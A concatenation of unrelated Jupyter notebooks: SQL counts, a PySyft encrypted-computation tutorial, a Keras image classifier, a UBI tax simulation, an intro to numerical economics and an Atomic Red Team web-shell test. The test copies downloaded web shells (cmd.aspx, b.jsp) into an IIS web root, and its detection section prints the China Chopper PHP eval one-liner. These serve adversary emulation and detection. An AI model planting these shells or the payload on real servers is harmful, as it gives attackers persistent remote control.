Now let's count up the number of unique patients, samples and aliquots mentioned in this table. We will do this by defining a very simple parameterized query. (Note that when using a variable for the table name in the FROM clause, you should not also use the square brackets that you usually would if you were specifying the table name as a string.)
```
%%sql --module count_unique
DEFINE QUERY q1
SELECT COUNT (DISTINCT $f, 25000) AS n
FROM $t
fieldList = ['ParticipantBarcode', 'SampleBarcode', 'AliquotBarcode']
for aField in fieldList:
field = miRNA_BQtable.schema[aField]
rdf = bq.Query(count_unique.q1,t=miRNA_BQtable,f=field).results().to_dataframe()
print " There are %6d unique values in the field %s. " % ( rdf.iloc[0]['n'], aField)
```
```
fieldList = ['mirna_id', 'mirna_accession']
for aField in fieldList:
field = miRNA_BQtable.schema[aField]
rdf = bq.Query(count_unique.q1,t=miRNA_BQtable,f=field).results().to_dataframe()
print " There are %6d unique values in the field %s. " % ( rdf.iloc[0]['n'], aField)
```
These counts show that the mirna_id field is not a unique identifier and should be used in combination with the MIMAT accession number.
Another thing to note about this table is that these expression values are obtained from two different platforms -- approximately 15% of the data is from the Illumina GA platform, and 85% from the Illumina HiSeq:
```
%%sql
SELECT
Platform,
COUNT(*) AS n
FROM
$miRNA_BQtable
GROUP BY
Platform
ORDER BY
n DESC
```
| github_jupyter |
# Part 9 - Intro to Encrypted Programs
Believe it or not, it is possible to compute with encrypted data. In other words, it's possible to run a program where **ALL of the variables** in the program are **encrypted**!
In this tutorial, we're going to walk through very basic tools of encrypted computation. In particular, we're going to focus on one popular approach called Secure Multi-Party Computation. In this lesson, we'll learn how to build an encrypted calculator which can perform calculations on encrypted numbers.
Authors:
- Andrew Trask - Twitter: [@iamtrask](https://twitter.com/iamtrask)
- Théo Ryffel - GitHub: [@LaRiffle](https://github.com/LaRiffle)
References:
- Morten Dahl - [Blog](https://mortendahl.github.io) - Twitter: [@mortendahlcs](https://twitter.com/mortendahlcs)
# Step 1: Encryption Using Secure Multi-Party Computation
SMPC is at first glance a rather strange form of "encryption". Instead of using a public/private key to encrypt a variable, each value is split into multiple `shares`, each of which operates like a private key. Typically, these `shares` will be distributed amongst 2 or more _owners_. Thus, in order to decrypt the variable, all owners must agree to allow the decryption. In essence, everyone has a private key.
### Encrypt()
So, let's say we wanted to "encrypt" a variable `x`, we could do so in the following way.
> Encryption doesn't use floats or real numbers but happens in a mathematical space called [integer quotient ring](http://mathworld.wolfram.com/QuotientRing.html) which is basically the integers between `0` and `Q-1`, where `Q` is prime and "big enough" so that the space can contain all the numbers that we use in our experiments. In practice, given a value `x` integer, we do `x % Q` to fit in the ring. (That's why we avoid using number `x' > Q`).
```
Q = 1234567891011
x = 25
import random
def encrypt(x):
share_a = random.randint(-Q,Q)
share_b = random.randint(-Q,Q)
share_c = (x - share_a - share_b) % Q
return (share_a, share_b, share_c)
encrypt(x)
```
As you can see here, we have split our variable `x` into 3 different shares, which could be sent to 3 different owners.
### Decrypt()
If we wanted to decrypt these 3 shares, we could simply sum them together and take the modulus of the result (mod Q)
```
def decrypt(*shares):
return sum(shares) % Q
a,b,c = encrypt(25)
decrypt(a, b, c)
```
Importantly, notice that if we try to decrypt with only two shares, the decryption does not work!
```
decrypt(a, b)
```
Thus, we need all of the owners to participate in order to decrypt the value. It is in this way that the `shares` act like private keys, all of which must be present in order to decrypt a value.
# Step 2: Basic Arithmetic Using SMPC
However, the truly extraordinary property of Secure Multi-Party Computation is the ability to perform computation **while the variables are still encrypted**. Let's demonstrate simple addition below.
```
x = encrypt(25)
y = encrypt(5)
def add(x, y):
z = list()
# the first worker adds their shares together
z.append((x[0] + y[0]) % Q)
# the second worker adds their shares together
z.append((x[1] + y[1]) % Q)
# the third worker adds their shares together
z.append((x[2] + y[2]) % Q)
return z
decrypt(*add(x,y))
```
### Success!!!
And there you have it! If each worker (separately) adds their shares together, then the resulting shares will decrypt to the correct value (25 + 5 == 30).
As it turns out, SMPC protocols exist which can allow this encrypted computation for the following operations:
- addition (which we've just seen)
- multiplication
- comparison
and using these basic underlying primitives, we can perform arbitrary computation!!!
In the next section, we're going to learn how to use the PySyft library to perform these operations!
# Step 3: SMPC Using PySyft
In the previous sections, we outlined some basic intuitions around SMPC is supposed to work. However, in practice we don't want to have to hand-write all of the primitive operations ourselves when writing our encrypted programs. So, in this section we're going to walk through the basics of how to do encrypted computation using PySyft. In particular, we're going to focus on how to do the 3 primitives previously mentioned: addition, multiplication, and comparison.
First, we need to create a few Virtual Workers (which hopefully you're now familiar with given our previous tutorials).
```
import torch
import syft as sy
hook = sy.TorchHook(torch)
bob = sy.VirtualWorker(hook, id="bob")
alice = sy.VirtualWorker(hook, id="alice")
bill = sy.VirtualWorker(hook, id="bill")
```
### Basic Encryption/Decryption
Encryption is as simple as taking any PySyft tensor and calling .share(). Decryption is as simple as calling .get() on the shared variable
```
x = torch.tensor([25])
x
encrypted_x = x.share(bob, alice, bill)
encrypted_x.get()
```
### Introspecting the Encrypted Values
If we look closer at Bob, Alice, and Bill's workers, we can see the shares that get created!
```
list(bob._tensors.values())
x = torch.tensor([25]).share(bob, alice, bill)
# Bob's share
bobs_share = list(bob._tensors.values())[0]
bobs_share
# Alice's share
alices_share = list(alice._tensors.values())[0]
alices_share
# Bill's share
bills_share = list(bill._tensors.values())[0]
bills_share
```
And if we wanted to, we could decrypt these values using the SAME approach we talked about earlier!!!
```
(bobs_share + alices_share + bills_share)
```
As you can see, when we called `.share()` it simply split the value into 3 shares and sent one share to each of the parties!
# Encrypted Arithmetic
And now you see that we can perform arithmetic on the underlying values! The API is constructed so that we can simply perform arithmetic like we would normal PyTorch tensors.
```
x = torch.tensor([25]).share(bob,alice)
y = torch.tensor([5]).share(bob,alice)
z = x + y
z.get()
z = x - y
z.get()
```
# Encrypted Multiplication
For multiplication we need an additional party who is responsible for consistently generating random numbers (and not colluding with any of the other parties). We call this person a "crypto provider". For all intensive purposes, the crypto provider is just an additional VirtualWorker, but it's important to acknowledge that the crypto provider is not an "owner" in that he/she doesn't own shares but is someone who needs to be trusted to not collude with any of the existing shareholders.
```
crypto_provider = sy.VirtualWorker(hook, id="crypto_provider")
x = torch.tensor([25]).share(bob,alice, crypto_provider=crypto_provider)
y = torch.tensor([5]).share(bob,alice, crypto_provider=crypto_provider)
# multiplication
z = x * y
z.get()
```
You can also do matrix multiplication
```
x = torch.tensor([[1, 2],[3,4]]).share(bob,alice, crypto_provider=crypto_provider)
y = torch.tensor([[2, 0],[0,2]]).share(bob,alice, crypto_provider=crypto_provider)
# matrix multiplication
z = x.mm(y)
z.get()
```
# Encrypted comparison
It is also possible to private comparisons between private values. We support two crypto protocols to achieve this:
- the SecureNN protocol referenced as `snn` (more details can be found [here](https://eprint.iacr.org/2018/442.pdf))
- the Function Secret Sharing protocol referenced as `fss` (more details can be found [here](https://arxiv.org/abs/2006.04593))
We don't inspect here the differences between these protocols and we recommend to stick to the default choice, but you can always switch to a different protocol by adding the `protocol="fss"` option for example to the `.share(...)` instruction.
The result of the comparison is also a private shared tensor.
```
x = torch.tensor([25]).share(bob,alice, crypto_provider=crypto_provider)
y = torch.tensor([5]).share(bob,alice, crypto_provider=crypto_provider)
z = x > y
z.get()
z = x <= y
z.get()
z = x == y
z.get()
z = x == y + 20
z.get()
```
You can also perform max operations
```
x = torch.tensor([2, 3, 4, 1]).share(bob,alice, crypto_provider=crypto_provider)
x.max().get()
x = torch.tensor([[2, 3], [4, 1]]).share(bob,alice, crypto_provider=crypto_provider)
max_values = x.max(dim=0)
max_values.get()
```
# Congratulations!!! - Time to Join the Community!
Congratulations on completing this notebook tutorial! If you enjoyed this and would like to join the movement toward privacy preserving, decentralized ownership of AI and the AI supply chain (data), you can do so in the following ways!
### Star PySyft on GitHub
The easiest way to help our community is just by starring the Repos! This helps raise awareness of the cool tools we're building.
- [Star PySyft](https://github.com/OpenMined/PySyft)
### Join our Slack!
The best way to keep up to date on the latest advancements is to join our community! You can do so by filling out the form at [http://slack.openmined.org](http://slack.openmined.org)
### Join a Code Project!
The best way to contribute to our community is to become a code contributor! At any time you can go to PySyft GitHub Issues page and filter for "Projects". This will show you all the top level Tickets giving an overview of what projects you can join! If you don't want to join a project, but you would like to do a bit of coding, you can also look for more "one off" mini-projects by searching for GitHub issues marked "good first issue".
- [PySyft Projects](https://github.com/OpenMined/PySyft/issues?q=is%3Aopen+is%3Aissue+label%3AProject)
- [Good First Issue Tickets](https://github.com/OpenMined/PySyft/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22)
### Donate
If you don't have time to contribute to our codebase, but would still like to lend support, you can also become a Backer on our Open Collective. All donations go toward our web hosting and other community expenses such as hackathons and meetups!
[OpenMined's Open Collective Page](https://opencollective.com/openmined)
| github_jupyter |
```
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
# Input data files are available in the "../input/" directory.
from subprocess import check_output
print(check_output(["ls", "../input"]).decode("utf8"))
import os
import math
import cv2
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from mpl_toolkits.axes_grid1 import ImageGrid
from PIL import Image
import seaborn as sns
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten, Lambda
from keras.layers import Conv2D, MaxPooling2D, AveragePooling2D
from keras.layers.normalization import BatchNormalization
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras.callbacks import ModelCheckpoint
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
%matplotlib inline
filenames = os.listdir('../input/train-jpg')
df = pd.read_csv('../input/train_v2.csv')
df.info()
df.describe()
df['tag_set'] = df['tags'].map(lambda s: set(s.split(' ')))
tags = set()
for t in df['tags']:
s = set(t.split(' '))
tags = tags | s
tag_list = list(tags)
tag_list.sort()
tag_columns = ['tag_' + t for t in tag_list]
for t in tag_list:
df['tag_' + t] = df['tag_set'].map(lambda x: 1 if t in x else 0)
df.info()
df.describe()
df.head()
df[tag_columns].sum()
df[tag_columns].sum().sort_values().plot.bar()
tags_count = df.groupby('tags').count().sort_values(by='image_name', ascending=False)['image_name']
print('There are {} unique tag combinations'.format(len(tags_count)))
print()
print(tags_count)
from textwrap import wrap
def display(images, cols=None, maxcols=10, width=14, titles=None):
if cols is None:
cols = len(images)
n_cols = cols if cols < maxcols else maxcols
plt.rc('axes', grid=False)
fig1 = plt.figure(1, (width, width * math.ceil(len(images)/n_cols)))
grid1 = ImageGrid(
fig1,
111,
nrows_ncols=(math.ceil(len(images)/n_cols), n_cols),
axes_pad=(0.1, 0.6)
)
for index, img in enumerate(images):
grid1[index].grid = False
if titles is not None:
grid1[index].set_title('\n'.join(wrap(titles[index], width=25)))
if len(img.shape) == 2:
grid1[index].imshow(img, cmap='gray')
else:
grid1[index].imshow(img)
def load_image(filename, resize=True, folder='train-jpg'):
img = mpimg.imread('../input/{}/{}.jpg'.format(folder, filename))
if resize:
img = cv2.resize(img, (64, 64))
return np.array(img)
def mean_normalize(img):
return (img - img.mean()) / (img.max() - img.min())
def normalize(img):
return img / 127.5 - 1
samples = df.sample(16)
sample_images = [load_image(fn) for fn in samples['image_name']]
INPUT_SHAPE = sample_images[0].shape
print(INPUT_SHAPE)
display(
sample_images,
cols=4,
titles=[t for t in samples['tags']]
)
def preprocess(img):
img = normalize(img)
return img
display(
[(127.5 * (preprocess(img) + 1)).astype(np.uint8) for img in sample_images],
cols=4,
titles=[t for t in samples['tags']]
)
```
# Learn
```
df_train = df
X = df_train['image_name'].values
y = df_train[tag_columns].values
n_features = 1
n_classes = y.shape[1]
X, y = shuffle(X, y)
X_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=0.1)
print('We\'ve got {} feature rows and {} labels'.format(len(X_train), len(y_train)))
print('Each row has {} features'.format(n_features))
print('and we have {} classes'.format(n_classes))
assert(len(y_train) == len(X_train))
print('We use {} rows for training and {} rows for validation'.format(len(X_train), len(X_valid)))
print('Each image has the shape:', INPUT_SHAPE)
print('So far, so good')
print('Memory usage (train) kB', X_train.nbytes//(1024))
print('Memory usage (valid) kB', X_valid.nbytes//(1024))
def generator(X, y, batch_size=32):
X_copy, y_copy = X, y
while True:
for i in range(0, len(X_copy), batch_size):
X_result, y_result = [], []
for x, y in zip(X_copy[i:i+batch_size], y_copy[i:i+batch_size]):
rx, ry = [load_image(x)], [y]
rx = np.array([preprocess(x) for x in rx])
ry = np.array(ry)
X_result.append(rx)
y_result.append(ry)
X_result, y_result = np.concatenate(X_result), np.concatenate(y_result)
yield shuffle(X_result, y_result)
X_copy, y_copy = shuffle(X_copy, y_copy)
from keras import backend as K
def fbeta(y_true, y_pred, threshold_shift=0):
beta = 2
# just in case of hipster activation at the final layer
y_pred = K.clip(y_pred, 0, 1)
# shifting the prediction threshold from .5 if needed
y_pred_bin = K.round(y_pred + threshold_shift)
tp = K.sum(K.round(y_true * y_pred_bin)) + K.epsilon()
fp = K.sum(K.round(K.clip(y_pred_bin - y_true, 0, 1)))
fn = K.sum(K.round(K.clip(y_true - y_pred, 0, 1)))
precision = tp / (tp + fp)
recall = tp / (tp + fn)
beta_squared = beta ** 2
return (beta_squared + 1) * (precision * recall) / (beta_squared * precision + recall + K.epsilon())
# define the model
model = Sequential()
model.add(Conv2D(48, (8, 8), strides=(2, 2), input_shape=INPUT_SHAPE, activation='elu'))
model.add(BatchNormalization())
model.add(Conv2D(64, (8, 8), strides=(2, 2), activation='elu'))
model.add(BatchNormalization())
model.add(Conv2D(96, (5, 5), strides=(2, 2), activation='elu'))
model.add(BatchNormalization())
model.add(Conv2D(96, (3, 3), activation='elu'))
model.add(BatchNormalization())
model.add(Flatten())
model.add(Dropout(0.3))
model.add(Dense(256, activation='elu'))
model.add(BatchNormalization())
model.add(Dense(64, activation='elu'))
model.add(BatchNormalization())
model.add(Dense(n_classes, activation='sigmoid'))
model.compile(
optimizer='adam',
loss='binary_crossentropy',
metrics=[fbeta, 'accuracy']
)
model.summary()
EPOCHS = 3
BATCH = 32
PER_EPOCH = 256
X_train, y_train = shuffle(X_train, y_train)
X_valid, y_valid = shuffle(X_valid, y_valid)
filepath="weights-improvement-{epoch:02d}-{val_fbeta:.3f}.hdf5"
checkpoint = ModelCheckpoint(filepath, monitor='val_fbeta', verbose=1, save_best_only=True, mode='max')
callbacks_list = [checkpoint]
history = model.fit_generator(
generator(X_train, y_train, batch_size=BATCH),
steps_per_epoch=PER_EPOCH,
epochs=EPOCHS,
validation_data=generator(X_valid, y_valid, batch_size=BATCH),
validation_steps=len(y_valid)//(4*BATCH),
callbacks=callbacks_list
)
```
| github_jupyter |
# Andrew Yang's Freedom Dividend: Find revenue-neutral parameters
Estimate the effect of Andrew Yang's [Freedom Dividend](https://www.yang2020.com/policies/the-freedom-dividend/) of $12,000 per year per adult over age 18, funded by a 10 percent [value-added tax](https://www.yang2020.com/policies/value-added-tax/) and reducing benefits by up to the UBI amount for each tax unit.
Use `skopt.gbrt_minimize` (gradient boosted trees), which another test (`yang_choose_rn_opt_routine.ipynb`) showed performs best of the four `skopt` routines.
Assumptions:
* Adults are 18+ not 19+, for data availability.
* Benefits include SNAP, WIC, SSI, and TANF. Per Yang's [tweet](https://twitter.com/AndrewYang/status/970104619832659968), it excludes housing benefits and Medicare. It also excludes Medicaid, veteran's benefits (which are largely pension and healthcare) and "other benefits" included in C-TAM, which also include some healthcare.
* VAT incidence is proportional to [Tax Policy Center's estimate](https://www.taxpolicycenter.org/briefing-book/who-would-bear-burden-vat) of a 5 percent VAT's effect as of 2015. These are scaled linearly to match Yang's estimate that his VAT would raise $800 billion per year.
* VAT incidence is treated as an income tax; per TPC:
>Conceptually, the tax can either raise the total price (inclusive of the sales tax) paid by consumers or reduce the amount of business revenue available to compensate workers and investors. Theory and evidence suggest that the VAT is passed along to consumers via higher prices. Either way, the decline in real household income is the same regardless of whether prices rise (holding nominal incomes constant) or whether nominal incomes fall (holding the price level constant).
Should be ~$650.
*Data: CPS | Tax year: 2019 | Type: Static | Author: Max Ghenis*
## Setup
### Imports
```
import taxcalc as tc
import microdf as mdf
import pandas as pd
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
import skopt
from skopt import plots as skopt_plots
tc.__version__
```
### Settings
```
sns.set_style('white')
DPI = 500
mpl.rc('savefig', dpi=DPI)
mpl.rcParams['figure.dpi'] = DPI
mpl.rcParams['figure.figsize'] = 6.4, 4.8 # Default.
mpl.rcParams['font.sans-serif'] = 'Roboto'
mpl.rcParams['font.family'] = 'sans-serif'
# Set title text color to dark gray (https://material.io/color) not black.
TITLE_COLOR = '#212121'
mpl.rcParams['text.color'] = TITLE_COLOR
# Axis titles and tick marks are medium gray.
AXIS_COLOR = '#757575'
mpl.rcParams['axes.labelcolor'] = AXIS_COLOR
mpl.rcParams['xtick.color'] = AXIS_COLOR
mpl.rcParams['ytick.color'] = AXIS_COLOR
GRID_COLOR = '#eeeeee' # Previously lighter #f5f5f5.
# Use Seaborn's default color palette.
# https://stackoverflow.com/q/48958426/1840471 for reproducibility.
sns.set_palette(sns.color_palette())
# Show one decimal in tables.
pd.set_option('precision', 2)
```
## Major parameters
```
UBI_MAX = 1000 * 12 # Maximum amount to test.
TOTAL_VAT = 800e9
TOTAL_FTT = 50e9
CARBON_FEE = 20 # It's actually $40, but half goes to clean energy projects.
CARBON_FEE_TPC = 49 # Fee from the paper.
CARBON_FEE_UBI_SHARE = 0.5 # Half goes to UBI, half to other projects.
PCT_CITIZEN = 0.93
# Yang's plan wouldn't be enacted until 2021, but
# this allows people to enter current income.
YEAR = 2019
```
## Data
```
recs = tc.Records.cps_constructor()
BENS = ['snap_ben', 'ssi_ben', 'tanf_ben', 'wic_ben']
```
Exclude Medicaid and Medicare from `aftertax_income`.
NB: This is equivalent to setting their consumption value to zero, which would be an assumption rather than a reform.
```
MCAID_MCARE_REPEAL_REFORM = {
'BEN_mcaid_repeal': {2019: True},
'BEN_mcare_repeal': {2019: True},
}
YANG_REFORM = {
'SS_Earnings_c': {2019: 9e99},
'CG_nodiff': {2019: True}
}
# Also exclude Medicaid and Medicare.
YANG_REFORM.update(MCAID_MCARE_REPEAL_REFORM)
BASE_GROUP_VARS = ['nu18', 'n1820', 'n21', 'aftertax_income',
'expanded_income', 'XTOT'] + BENS + mdf.ECI_REMOVE_COLS
GROUP_VARS = 'combined'
# Don't use metric_vars since we'll split later by citizenry.
base0 = mdf.calc_df(records=recs, year=YEAR,
group_vars=mdf.listify([BASE_GROUP_VARS, GROUP_VARS]),
reform=MCAID_MCARE_REPEAL_REFORM).drop('tax', axis=1)
# Don't use metric_vars since we'll split later by citizenry.
yang0 = mdf.calc_df(records=recs, year=YEAR, group_vars=GROUP_VARS,
reform=YANG_REFORM).drop('tax', axis=1)
```
Duplicate records to make citizens and noncitizens, and create new record IDs.
```
def split_citizen_noncitizen(df, pct_citizen):
# Citizen.
citizen = df.copy(deep=True)
citizen['citizen'] = True
citizen.s006 *= PCT_CITIZEN
citizen.index = citizen.index.astype(str) + 'c'
# Noncitizen.
non_citizen = df.copy(deep=True)
non_citizen['citizen'] = False
non_citizen.s006 *= 1 - PCT_CITIZEN
non_citizen.index = non_citizen.index.astype(str) + 'nc'
# Combine.
return pd.concat([citizen, non_citizen])
def prep_data(df0):
df = split_citizen_noncitizen(df0, PCT_CITIZEN)
# Consider the change in
mdf.add_weighted_metrics(df, ['expanded_income', 'aftertax_income',
'combined', 'XTOT'])
# Add
df['tpc_eci'] = mdf.tpc_eci(df)
mdf.add_weighted_quantiles(df, 'tpc_eci')
df['bens'] = df[BENS].sum(axis=1)
df['adults'] = df.n1820 + df.n21
df['adult_citizens'] = df.adults * df.citizen
return df
base = prep_data(base0)
yang = split_citizen_noncitizen(yang0, PCT_CITIZEN)
```
### Combine
We only need combined tax liability.
```
yang = yang[['combined']].join(base, lsuffix='_reform', rsuffix='_base')
```
Recalculate after-tax income with the change in combined tax liability.
*This assumes that the employee bears the entirety of the additional payroll tax.*
```
yang['combined_chg'] = yang.combined_reform - yang.combined_base
yang.aftertax_income = yang.aftertax_income - yang.combined_chg
mdf.add_weighted_metrics(yang, 'aftertax_income')
```
Drop unnecessary columns.
```
yang.drop(['combined_reform', 'combined_base'], axis=1, inplace=True)
mdf.add_weighted_metrics(base, ['bens', 'combined'])
```
### Revenue-neutral
```
def yang_shortfall(ubi=UBI_MAX, base=base, yang=yang):
print("Trying UBI level $" + str(round(ubi, 2)) + "...")
# Don't overwrite existing file.
yang = yang.copy(deep=True)
yang['max_ubi'] = yang.adult_citizens * ubi
# Adds `ubi` column based on max_ubi and bens. Also adjusts bens.
mdf.ubi_or_bens(yang, BENS)
yang['aftertax_income_pre_new_taxes'] = (
yang.aftertax_income + yang.combined_chg)
# Update ECI.
yang['tpc_eci'] = mdf.tpc_eci(yang) + yang.ubi
# Weight.
mdf.add_weighted_metrics(yang,
['ubi', 'max_ubi', 'bens', 'aftertax_income'])
# New taxes:
# VAT.
mdf.add_vat(yang, total=TOTAL_VAT, verbose=False)
yang.combined_chg = yang.combined_chg + yang.vat
yang.aftertax_income = yang.aftertax_income - yang.vat
vat_rev_b = mdf.weighted_sum(yang, 'vat') / 1e9
# Carbon tax.
mdf.add_carbon_tax(yang, ratio=CARBON_FEE / CARBON_FEE_TPC, verbose=False)
yang.combined_chg = yang.combined_chg + yang.carbon_tax
yang.aftertax_income = yang.aftertax_income - yang.carbon_tax
carbon_tax_rev_b = mdf.weighted_sum(yang, 'carbon_tax') / 1e9
# FTT.
mdf.add_ftt(yang, total=TOTAL_FTT, verbose=False)
yang.combined_chg = yang.combined_chg + yang.ftt
yang.aftertax_income = yang.aftertax_income - yang.ftt
ftt_rev_b = mdf.weighted_sum(yang, 'ftt') / 1e9
# Reweight.
mdf.add_weighted_metrics(yang,
['aftertax_income', 'combined_chg',
'aftertax_income_pre_new_taxes'])
bens_chg_m = yang.bens_m.sum() - base.bens_m.sum()
tax_chg_m = yang.combined_chg_m.sum()
return (yang.ubi_m.sum() + bens_chg_m - tax_chg_m) * 1e6
def yang_abs_shortfall(ubi):
return np.abs(yang_shortfall(ubi[0]))
```
Test.
```
yang_abs_shortfall([12000]) / 1e12 # Trillions.
gbrt_res = skopt.gbrt_minimize(yang_abs_shortfall, [(0., UBI_MAX)],
n_calls=100, n_jobs=-1, random_state=827)
'Revenue-neutral UBI: $' + str(round(gbrt_res.x[0] / 12, 2)) + '.'
skopt_plots.plot_convergence(gbrt_res)
plt.yscale('log')
plt.show()
def shortfall_by_ubi(ubi=UBI_MAX):
return pd.DataFrame({'ubi': [ubi],
'shortfall': [yang_shortfall(ubi)]})
shortfalls_l = []
for i in np.arange(0, UBI_MAX + 1, 1200):
shortfalls_l.append(shortfall_by_ubi(ubi=i))
shortfalls = pd.concat(shortfalls_l)
shortfalls['abs_shortfall'] = np.abs(shortfalls.shortfall)
shortfalls['ubi_monthly'] = shortfalls.ubi / 12
shortfalls
ax = shortfalls.sort_values('ubi').plot('ubi_monthly', 'shortfall')
plt.title('Budget shortfall by monthly UBI with Yang revenue proposals',
loc='left')
sns.despine(left=True, bottom=True)
ax.get_xaxis().set_major_formatter(
mpl.ticker.FuncFormatter(lambda x, p: '$' + format(int(x), ',')))
ax.get_yaxis().set_major_formatter(
mpl.ticker.FuncFormatter(lambda x, p: '$' + format(x / 1e12) + 'T'))
ax.grid(color=GRID_COLOR)
ax.legend_.remove()
ax.axhline(0, color='lightgray', zorder=-1) # Widen?
plt.xlabel('Monthly UBI')
plt.ylabel('Budget shortfall')
plt.show()
```
| github_jupyter |
# T1505.003 - Server Software Component: Web Shell
Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.
In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)
## Atomic Tests
```
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force
```
### Atomic Test #1 - Web Shell Written to Disk
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk.
Idea from APTSimulator.
cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
**Supported Platforms:** windows
#### Dependencies: Run with `powershell`!
##### Description: Web shell must exist on disk at specified location (#{web_shells})
##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1505.003\src\) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path PathToAtomicsFolder\T1505.003\src\) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "PathToAtomicsFolder\T1505.003\src\/b.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "PathToAtomicsFolder\T1505.003\src\/test.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "PathToAtomicsFolder\T1505.003\src\/cmd.aspx"
```
```
Invoke-AtomicTest T1505.003 -TestNumbers 1 -GetPreReqs
```
#### Attack Commands: Run with `command_prompt`
```command_prompt
xcopy PathToAtomicsFolder\T1505.003\src\ C:\inetpub\wwwroot
```
```
Invoke-AtomicTest T1505.003 -TestNumbers 1
```
## Detection
Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013)
<code><?php @eval($_POST['password']);></code>
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)
| github_jupyter |
# Introduction
**Summary:** The Jupyter notebook is a document with text, code and results.
This is a text cell, or more precisely a *markdown* cell.
* Pres <kbd>Enter</kbd> to *edit* the cell.
* Pres <kbd>Ctrl+Enter</kbd> to *run* the cell.
* Pres <kbd>Shift+Enter</kbd> to *run* the cell + advance.
We can make lists:
1. **First** item
2. *Second* item
3. ~~Third~~ item
We can also do LaTeX math, e.g. $\alpha^2$ or
$$
X = \int_0^{\infty} \frac{x}{x+1} dx
$$
```
# this is a code cell
# let us do some calculations
a = 2
b = 3
c = a+b
# lets print the results (shown below the cell)
print(c)
```
We can now write some more text, and continue with our calculations.
```
d = c*2
print(d)
```
**Note:** Despite JupyterLab is running in a browser, it is running offline (the path is something like *localhos:8888/lab*).<br>
**Binder:** The exception is if you use *binder*, then JupyterLab wil run in the cloud, and the path will begin with *hub.mybinder.org*:
[<img src="https://mybinder.org/badge_logo.svg">](https://mybinder.org/v2/gh/NumEconCopenhagen/lectures-2019/master?urlpath=lab/tree/01/Introduction.ipynb)
**Note:** *You cannot save your result when using binder*.
# Solve the consumer problem
Consider the following consumer problem:
$$
\begin{aligned}
V(p_{1},p_{2},I) & = \max_{x_{1},x_{2}} x_{1}^{\alpha}x_{2}^{1-\alpha}\\
& \text{s.t.}\\
p_{1}x_{1}+p_{2}x_{2} & \leq I,\,\,\,p_{1},p_{2},I>0\\
x_{1},x_{2} & \geq 0
\end{aligned}
$$
We can solve this problem _numerically_ in a few lines of code.
1. Choose some **parameters**:
```
alpha = 0.25
I = 10
p1 = 1
p2 = 2
```
2. The **consumer objective** is:
```
def value_of_choice(x1,alpha,I,p1,p2):
# a. all income not spent on the first good
# is spent on the second
x2 = (I-p1*x1)/p2
# b. the resulting utility is
utility = x1**alpha * x2**(1-alpha)
return utility
```
3. We can now use a function from the *scipy* module to **solve the consumer problem**.
```
# a. load external module from scipy
from scipy import optimize
# b. make value-of-choice as a funciton of only x1
obj = lambda x1: -value_of_choice(x1,alpha,I,p1,p2)
# c. call minimizer
solution = optimize.minimize_scalar(obj,bounds=(0,I/p1))
# d. print result
x1 = solution.x
x2 = (I-x1*p1)/p2
print(x1,x2)
```
**Task**: Solve the consumer problem with the CES utility funciton.
$$
u(x_1,x_2) = (\alpha x_1^{-\beta} + (1-\alpha) x_2^{-\beta})^{-1/\beta}
$$
```
# update this code
# a. choose parameters
alpha = 0.5
beta = 0.000001
I = 10
p1 = 1
p2 = 2
# b. value-of-choice
def value_of_choice_ces(x1,alpha,beta,I,p1,p2):
x2 = (I-p1*x1)/p2
if x1 > 0 and x2 > 0:
utility = (alpha*x1**(-beta)+(1-alpha)*x2**(-beta))**(-1/beta)
else:
utility = 0
return utility
# c. objective
obj = lambda x1: -value_of_choice_ces(x1,alpha,beta,I,p1,p2)
# d. solve
solution = optimize.minimize_scalar(obj,bounds=(0,I/p1))
# e. result
x1 = solution.x
x2 = (I-x1*p1)/p2
print(x1,x2)
```
# Simulate the AS-AD model
Consider the following AS-AD model:
$$
\begin{aligned}
\hat{y}_{t} &= b\hat{y}_{t-1}+\beta(z_{t}-z_{t-1})-a\beta s_{t}+a\beta\phi s_{t-1} \\
\hat{\pi}_{t} &= b\hat{\pi}_{t-1}+\beta\gamma z_{t}-\beta\phi\gamma z_{t}+\beta s_{t}-\beta\phi s_{t-1} \\
z_{t} &= \delta z_{t-1}+x_{t}, x_{t} \sim N(0,\sigma_x^2) \\
s_{t} &= \omega s_{t-1}+c_{t}, c_{t} \sim N(0,\sigma_c^2) \\
